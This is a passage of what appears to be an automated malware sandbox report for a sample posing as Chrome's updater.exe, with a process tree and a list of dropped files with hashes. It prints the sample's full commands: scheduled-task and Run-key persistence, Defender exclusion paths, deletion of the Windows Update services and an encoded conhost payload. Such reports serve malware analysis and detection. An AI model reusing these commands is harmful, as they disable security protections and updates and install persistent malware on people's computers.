                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        3⤵
                          PID:3644
                      • C:\Windows\System32\cmd.exe
                        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        2⤵
                        • Power Settings
                        • Suspicious use of WriteProcessMemory
                        PID:3196
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4444
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3132
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4424
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4832
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:400
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:1384
                        • C:\Windows\system32\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                          3⤵
                            PID:4564
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2640
                        • C:\Windows\System32\cmd.exe
                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2280
                          • C:\Windows\System32\sc.exe
                            sc stop UsoSvc
                            3⤵
                            • Launches sc.exe
                            PID:3876
                          • C:\Windows\System32\sc.exe
                            sc stop WaaSMedicSvc
                            3⤵
                            • Launches sc.exe
                            PID:2272
                          • C:\Windows\System32\sc.exe
                            sc stop wuauserv
                            3⤵
                            • Launches sc.exe
                            PID:3164
                          • C:\Windows\System32\sc.exe
                            sc stop bits
                            3⤵
                            • Launches sc.exe
                            PID:2120
                          • C:\Windows\System32\sc.exe
                            sc stop dosvc
                            3⤵
                            • Launches sc.exe
                            PID:4628
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                            3⤵
                              PID:4876
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                              3⤵
                                PID:624
                              • C:\Windows\System32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                3⤵
                                  PID:2700
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                  3⤵
                                    PID:4680
                                  • C:\Windows\System32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                    3⤵
                                      PID:3808
                                  • C:\Windows\System32\cmd.exe
                                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                    2⤵
                                    • Power Settings
                                    • Suspicious use of WriteProcessMemory
                                    PID:4648
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -hibernate-timeout-ac 0
                                      3⤵
                                      • Power Settings
                                      PID:1864
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -hibernate-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      PID:5032
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -standby-timeout-ac 0
                                      3⤵
                                      • Power Settings
                                      PID:1612
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -standby-timeout-dc 0
                                      3⤵
                                      • Power Settings
                                      PID:1624
                                  • C:\Windows\System32\conhost.exe
                                    C:\Windows\System32\conhost.exe ubulqosn
                                    2⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1992
                                  • C:\Windows\System32\cmd.exe
                                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                    2⤵
                                      PID:2196
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      2⤵
                                        PID:2572
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic PATH Win32_VideoController GET Name, VideoProcessor
                                          3⤵
                                          • Detects videocard installed
                                          PID:4688
                                      • C:\Windows\System32\conhost.exe
                                        C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4900
                                    • C:\Program Files\Google\Chrome\updater.exe
                                      "C:\Program Files\Google\Chrome\updater.exe"
                                      1⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2232
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:468
                                    • C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
                                      "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      • Modifies data under HKEY_USERS
                                      PID:5916
                                      • C:\Program Files\McAfee\WebAdvisor\UIHost.exe
                                        "C:\Program Files\McAfee\WebAdvisor\UIHost.exe"
                                        2⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:4564
                                      • C:\Program Files\McAfee\WebAdvisor\updater.exe
                                        "C:\Program Files\McAfee\WebAdvisor\updater.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        PID:6112
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul
                                        2⤵
                                          PID:4456
                                      • C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
                                        "C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Enumerates system info in registry
                                        • Modifies data under HKEY_USERS
                                        PID:6016
                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks system information in the registry
                                        • System Location Discovery: System Language Discovery
                                        • Modifies data under HKEY_USERS
                                        PID:5176
                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjcuMjEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjcuMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0FENTkzMjAtQTQxQi00QTc5LTlDNkUtRTlDMjZBNTVGNEE5fSIgdXNlcmlkPSJ7MUNFQkUxQTYtRkRCRC00RDIwLUJCNDktMDE3MDdEN0M4ODgxfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntEQjhGOUE0QS1CNDJELTQ5MTAtODJFQi0zRjVGMDFBMDMxRkZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1ODc1Mzk3MzI4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks system information in the registry
                                          • System Location Discovery: System Language Discovery
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          PID:1448
                                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\MicrosoftEdge_X64_131.0.2903.112.exe
                                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\MicrosoftEdge_X64_131.0.2903.112.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                          2⤵
                                          • Executes dropped EXE
                                          PID:5888
                                          • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\EDGEMITMP_FE316.tmp\setup.exe
                                            "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\EDGEMITMP_FE316.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\MicrosoftEdge_X64_131.0.2903.112.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
                                            3⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            PID:3580
                                            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\EDGEMITMP_FE316.tmp\setup.exe
                                              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\EDGEMITMP_FE316.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.205 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2B0140C7-8A9F-4214-8F85-242F5380D8FF}\EDGEMITMP_FE316.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.112 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff685762918,0x7ff685762924,0x7ff685762930
                                              4⤵
                                              • Executes dropped EXE
                                              PID:976

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

                                        Filesize

                                        200KB

                                        MD5

                                        d1c3e60c8afb52d707e1fefda65fdea2

                                        SHA1

                                        79b739b599f804a822bf2059b84b1a58838f9a20

                                        SHA256

                                        32cef1f473157936b3adbb35b2566a619d4620af2998e05b01a493edf39d19ec

                                        SHA512

                                        95d6495a7f86424266105138c963504c33f30848e34d5d02a26fee8f1d6b2418d2f1b25e3261571feeecfa8a489c52412180f84cafc12f71fa0d1029c28afa03

                                      • C:\Program Files (x86)\Razer\Razer Axon\MicrosoftEdgeWebview2Setup.exe

                                        Filesize

                                        1.5MB

                                        MD5

                                        cf7f5cdb6443fef5c5e14351dfa52a61

                                        SHA1

                                        50b9178f04c1102938afa4badb5f03cfc0f8a9b9

                                        SHA256

                                        69a70d81c56c0fedf43d7a07ee0f8ad006383ec06733748ac83b0401bf937ddb

                                        SHA512

                                        0cdba91499cc421da6d330954a9e3211765ebc2c48034a93b5b084e5b2c7de93ca96af025f2e5e91054d113e4c7f8c0bec3a8c94269565ce7181ea165a57c3cc

                                      • C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe

                                        Filesize

                                        444KB

                                        MD5

                                        9b1162d3db3c147da611083209e18106

                                        SHA1

                                        2b25428e051b9e799c0216b0ae77b625bb7aec6b

                                        SHA256

                                        65cb7b72808357ee47c6831f3f2bad91681370c5f064f1dd00bde2526c8ac79c

                                        SHA512

                                        8cb17b165b9b3c48271db36216ef9a10ab5f6e384e336195598d4894df5b4e3267605a8f27a0aaf9aabb60ba12414e3cfadce6ffd92027106168672b7ac885e4

                                      • C:\Program Files (x86)\Razer\Razer Axon\is-RA03O.tmp

                                        Filesize

                                        382B

                                        MD5

                                        240d2b0c05811c7f04746af38c0810e2

                                        SHA1

                                        e740da7e6df6111c2a831535417c350ff3ad7151

                                        SHA256

                                        d2b1fea0967d3db90fb6f5d0c12ab4b978c33bbc08fff19ac1449829a334461e

                                        SHA512

                                        e9aa20d20b0c16a20f39fae0665e7c2188bc7478eea790df9ab8d4c454d2f314660e11d17f59ecf7822b0fa8d144d37b15c0b4b3b9bc3726dfae25cd5c76880d

                                      • C:\Program Files (x86)\Razer\Razer Axon\unins000.exe

                                        Filesize

                                        3.4MB

                                        MD5

                                        9583120fd25b608f742ca7aa80f6677d

                                        SHA1

                                        dc43bb015006918d2834791e177739649d0bb1f0

                                        SHA256

                                        aeca1f2f93b5dfc8de44b3375b59f7375b4ecb99efd7e953273cd8f9fe984b55

                                        SHA512

                                        e683a73e5f35e6d1ae4a4bf9a7a02db069c680d48c05579004983cd13ada9cb51298799d5a5261a193885781c88a283e536036e9af8e38137022ee2f1c026751

                                      • C:\Program Files (x86)\Razer\Razer Services\Razer Central\Service Worker.zip

                                        Filesize

                                        17.2MB

                                        MD5

                                        a7aab67f3095c0348d34c44d04b81458

                                        SHA1

                                        0833059827c9c2757baceb72151cf93d930c1920

                                        SHA256

                                        cac2ea373aa938d8d4e492e0d3dc1df24e428914cbb635c8f752a3ff71b51ec2

                                        SHA512

                                        71a97df0a24f96be8e200b9330032c91b19060811ac21497eb3eae58f5d2f72d2d4b748a5ed940f43840dde0e2859afb50d7d4ae2db387a7c522e5a706ed93b9

                                      • C:\Program Files (x86)\Razer\Razer Services\Razer Central\v8_context_snapshot.bin

                                        Filesize

                                        590KB

                                        MD5

                                        10409a90206eb4859d27095aebf4c392

                                        SHA1

                                        2a9aa6951c923ccb5ca25348e161ee8799985e7b

                                        SHA256

                                        2de3925cba036e1eec21eccd40c35e501958938cf9f96bd125e145ba12c446a2

                                        SHA512

                                        96d7d065ab39d9a1e7850eeb6d23df9da5b0f6e91ea5c6258a06cef3d39c5eeded3117e83cbc1d0a7b0ed73dc656ef0d2b50651bb99800902186b4f1fb1cfd8e

                                      • C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe

                                        Filesize

                                        389KB

                                        MD5

                                        f921416197c2ae407d53ba5712c3930a

                                        SHA1

                                        6a7daa7372e93c48758b9752c8a5a673b525632b

                                        SHA256

                                        e31b233ddf070798cc0381cc6285f6f79ea0c17b99737f7547618dcfd36cdc0e

                                        SHA512

                                        0139efb76c2107d0497be9910836d7c19329e4399aa8d46bbe17ae63d56ab73004c51b650ce38d79681c22c2d1b77078a7d7185431882baf3e7bef473ac95dce

                                      • C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe

                                        Filesize

                                        236KB

                                        MD5

                                        9af96706762298cf72df2a74213494c9

                                        SHA1

                                        4b5fd2f168380919524ecce77aa1be330fdef57a

                                        SHA256

                                        65fa2ccb3ac5400dd92dda5f640445a6e195da7c827107260f67624d3eb95e7d

                                        SHA512

                                        29a0619093c4c0ecf602c861ec819ef16550c0607df93067eaef4259a84fd7d40eb88cd5548c0b3b265f3ce5237b585f508fdd543fa281737be17c0551163bd4

                                      • C:\Program Files\Cheat Engine 7.5\allochook-i386.dll

                                        Filesize

                                        328KB

                                        MD5

                                        19d52868c3e0b609dbeb68ef81f381a9

                                        SHA1

                                        ce365bd4cf627a3849d7277bafbf2f5f56f496dc

                                        SHA256

                                        b96469b310ba59d1db320a337b3a8104db232a4344a47a8e5ae72f16cc7b1ff4

                                        SHA512

                                        5fbd53d761695de1dd6f0afd0964b33863764c89692345cab013c0b1b6332c24dcf766028f305cc87d864d17229d7a52bf19a299ca136a799053c368f21c8926

                                      • C:\Program Files\Cheat Engine 7.5\allochook-x86_64.dll

                                        Filesize

                                        468KB

                                        MD5

                                        daa81711ad1f1b1f8d96dc926d502484

                                        SHA1

                                        7130b241e23bede2b1f812d95fdb4ed5eecadbfd

                                        SHA256

                                        8422be70e0ec59c962b35acf8ad80671bcc8330c9256e6e1ec5c07691388cd66

                                        SHA512

                                        9eaa8e04ad7359a30d5e2f9256f94c1643d4c3f3c0dff24d6cd9e31a6f88cb3b470dd98f01f8b0f57bb947adc3d45c35749ed4877c7cbbbcc181145f0c361065

                                      • C:\Program Files\Cheat Engine 7.5\badassets\scoreboard.png

                                        Filesize

                                        5KB

                                        MD5

                                        5cff22e5655d267b559261c37a423871

                                        SHA1

                                        b60ae22dfd7843dd1522663a3f46b3e505744b0f

                                        SHA256

                                        a8d8227b8e97a713e0f1f5db5286b3db786b7148c1c8eb3d4bbfe683dc940db9

                                        SHA512

                                        e00f5b4a7fa1989382df800d168871530917fcd99efcfe4418ef1b7e8473caea015f0b252cac6a982be93b5d873f4e9acdb460c8e03ae1c6eea9c37f84105e50

                                      • C:\Program Files\Cheat Engine 7.5\cheatengine-i386.exe

                                        Filesize

                                        12.2MB

                                        MD5

                                        5be6a65f186cf219fa25bdd261616300

                                        SHA1

                                        b5d5ae2477653abd03b56d1c536c9a2a5c5f7487

                                        SHA256

                                        274e91a91a7a520f76c8e854dc42f96484af2d69277312d861071bde5a91991c

                                        SHA512

                                        69634d85f66127999ea4914a93b3b7c90bc8c8fab1b458cfa6f21ab0216d1dacc50976354f7f010bb31c5873cc2d2c30b4a715397fb0e9e01a5233c2521e7716

                                      • C:\Program Files\Cheat Engine 7.5\cheatengine-i386.exe.sig

                                        Filesize

                                        132B

                                        MD5

                                        adafb7cdca51fc803718f25172652dd3

                                        SHA1

                                        dd882b60a842b0992f478349898415a857934330

                                        SHA256

                                        b1b61b2570dbaf2747c4862b8429424514d300a7e14b5065c8bbb4b751179e7e

                                        SHA512

                                        d0b3d17f0f1efb8f2f0bcaa1295aed08043f0218bcfa092a47d46308911ec4bc2441711cab300b852de3dbced1c83536750b1a77a75eae5c8cbf95991aa88714

                                      • C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe

                                        Filesize

                                        15.9MB

                                        MD5

                                        910de25bd63b5da521fc0b598920c4ec

                                        SHA1

                                        94a15930aaf99f12b349be80924857673cdc8566

                                        SHA256

                                        8caef5000b57bca014ef33e962df4fca21aead0664892724674619ef732440ad

                                        SHA512

                                        6ff910bb4912fea1fa8fd91e47ae6348c8bf2eff4f2f5f9ef646a775ca1ecfef02c23f81baf6fe2d0b0bdda7617d91df52e75dc6063e86ea0444b0538cbd4e6c

                                      • C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe.sig

                                        Filesize

                                        132B

                                        MD5

                                        735eaea06dae6cd67680127419fba366

                                        SHA1

                                        a38126141a4266cdba17b22cbc4588d88ccfceb5

                                        SHA256

                                        5a2d3e0f10e3701dfb251c3f270b00493cead1c3d1ceb34ff976d70c57dc1b58

                                        SHA512

                                        92374bdc99bdddcc2a8b74049b9ff1623ee03b505ba2607e31301f95f2df8ef3513ecad4491e2b6b61934f64816e3e9ad3fa3b0914e96d6e55a4b4df4ed5e028

                                      • C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64.exe

                                        Filesize

                                        15.9MB

                                        MD5

                                        edeef697cbf212b5ecfcd9c1d9a8803d

                                        SHA1

                                        e90585899ae4b4385a6d0bf43c516c122e7883e2

                                        SHA256

                                        ac9bcc7813c0063bdcd36d8e4e79a59b22f6e95c2d74c65a4249c7d5319ae3f6

                                        SHA512

                                        1aaa8fc2f9fafecbe88abf07fbc97dc03a7c68cc1d870513e921bf3caeaa97128583293bf5078a69aecbb93bf1e531605b36bd756984db8d703784627d1877d1

                                      • C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64.exe.sig

                                        Filesize

                                        132B

                                        MD5

                                        fe5e5b8b50f441dd772bfa1996ac744e

                                        SHA1

                                        11d00533ade98e94c7c6609f4e4b002a94cb440c

                                        SHA256

                                        a769bc72c97106722bf5ce8d76afdc3ec54fc38931872b0637d8b7a281fffe22

                                        SHA512

                                        559fb92a2c58b84ac1cda6115aa175b0285ea98903eb1f6c91e3a0ecf39f6d667711f97d0eff8cd98ba25256ec7b339e38d892a90186db482587e1a80462a6eb

                                      • C:\Program Files\Cheat Engine 7.5\speedhack-i386.dll

                                        Filesize

                                        200KB

                                        MD5

                                        6e00495955d4efaac2e1602eb47033ee

                                        SHA1

                                        95c2998d35adcf2814ec7c056bfbe0a0eb6a100c

                                        SHA256

                                        5e24a5fe17ec001cab7118328a4bff0f2577bd057206c6c886c3b7fb98e0d6d9

                                        SHA512

                                        2004d1def322b6dd7b129fe4fa7bbe5d42ab280b2e9e81de806f54313a7ed7231f71b62b6138ac767288fee796092f3397e5390e858e06e55a69b0d00f18b866

                                      • C:\Program Files\Cheat Engine 7.5\speedhack-x86_64.dll

                                        Filesize

                                        256KB

                                        MD5

                                        19b2050b660a4f9fcb71c93853f2e79c

                                        SHA1

                                        5ffa886fa019fcd20008e8820a0939c09a62407a

                                        SHA256

                                        5421b570fbc1165d7794c08279e311672dc4f42cb7ae1cbddcd7eea0b1136fff

                                        SHA512

                                        a93e47387ab0d327b71c3045b3964c7586d0e03dddb2e692f6671fb99659e829591d5f23ce7a95683d82d239ba7d11fb5a123834629a53de5ce5dba6aa714a9a

                                      • C:\Program Files\Cheat Engine 7.5\vehdebug-i386.dll

                                        Filesize

                                        324KB

                                        MD5

                                        e9b5905d495a88adbc12c811785e72ec

                                        SHA1

                                        ca0546646986aab770c7cf2e723c736777802880

                                        SHA256

                                        3eb9cd27035d4193e32e271778643f3acb2ba73341d87fd8bb18d99af3dffdea

                                        SHA512

                                        4124180b118149c25f8ea8dbbb2912b4bd56b43f695bf0ff9c6ccc95ade388f1be7d440a791d49e4d5c9c350ea113cf65f839a3c47d705533716acc53dd038f8

                                      • C:\Program Files\Cheat Engine 7.5\vehdebug-x86_64.dll

                                        Filesize

                                        413KB

                                        MD5

                                        8d487547f1664995e8c47ec2ca6d71fe

                                        SHA1

                                        d29255653ae831f298a54c6fa142fb64e984e802

                                        SHA256

                                        f50baf9dc3cd6b925758077ec85708db2712999b9027cc632f57d1e6c588df21

                                        SHA512

                                        79c230cfe8907df9da92607a2c1ace0523a36c3a13296cb0265329208edc453e293d7fbedbd5410decf81d20a7fe361fdebddadbc1dc63c96130b0bedf5b1d8a

                                      • C:\Program Files\Google\Libs\g.log

                                        Filesize

                                        226B

                                        MD5

                                        fdba80d4081c28c65e32fff246dc46cb

                                        SHA1

                                        74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                        SHA256

                                        b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                        SHA512

                                        b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                      • C:\Program Files\McAfee\WebAdvisor\Analytics\dataConfig.cab

                                        Filesize

                                        74KB

                                        MD5

                                        001aab25a9ed3a8ee5c405901e6078f3

                                        SHA1

                                        939596b653e3ed74a5b76506c62cd68fe5c9265f

                                        SHA256

